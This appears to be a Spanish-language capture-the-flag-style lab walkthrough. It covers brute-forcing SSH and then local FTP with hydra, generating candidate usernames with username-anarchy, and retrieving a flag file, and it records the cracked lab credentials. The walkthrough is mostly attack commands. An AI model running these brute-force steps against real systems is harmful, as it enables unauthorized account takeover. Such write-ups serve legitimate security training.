Skills Assessment – Parte 2 (SSH & FTP Bruteforce)

info] Requisitos previos
Debes haber terminado la Parte 1, donde recibiste un nuevo usuario:
👉 satwossh

Ahora debes usarlo para forzar el acceso al servicio FTP del objetivo:
83.136.250.108:57168


📂 Wordlists recomendadas

Puedes usar las mismas del módulo anterior:

Escaneo

Hacemos un simple escaneo

nmap 94.237.122.95

Tiene ssh
{A44A7484-35F0-421D-9906-1DA2159E2C2C}.png

Fuerza bruta ssh

Ya que conocemos el usuario

hydra -l satwossh -P 2023-200_most_used_passwords.txt 83.136.250.108 -s 57168 ssh

{BEF91039-9692-4DEA-B325-9F24F20DF157}.png

Contraseña encontrada password1

Conexion a SSH

ssh satwossh@83.136.250.108 -p 57168

Antes compobramos i existe ftp en la máquin

netstat -tulpn | grep LISTEN

{118F5003-FD2E-4F04-8AFD-ED2140631192}.png

Si existe
Al entrar vemos que hay una nota

cat IncidentReport.txt

{9C02062B-9FCE-48DC-AC9D-70D02EA0B285}.png

La nota dice que Thomas Smith el usaurio lleva subiendo ficheros sospechosos

./username-anarchy Thomas Smith > Thomas_smith_usernames.txt

Despues de generar los posibles usuarios de thmos toca fuerzabruta

hydra -L username-anarchy/Thomas_smith_usernames.txt  -P passwords.txt  ftp://localhost

{44352344-E366-4FFE-82C8-1A37EAF7ABE0}.png

Usuario thomas contraseña chocolate!

Logueamos por ftp

ftp localhhost
dir
get flag.txt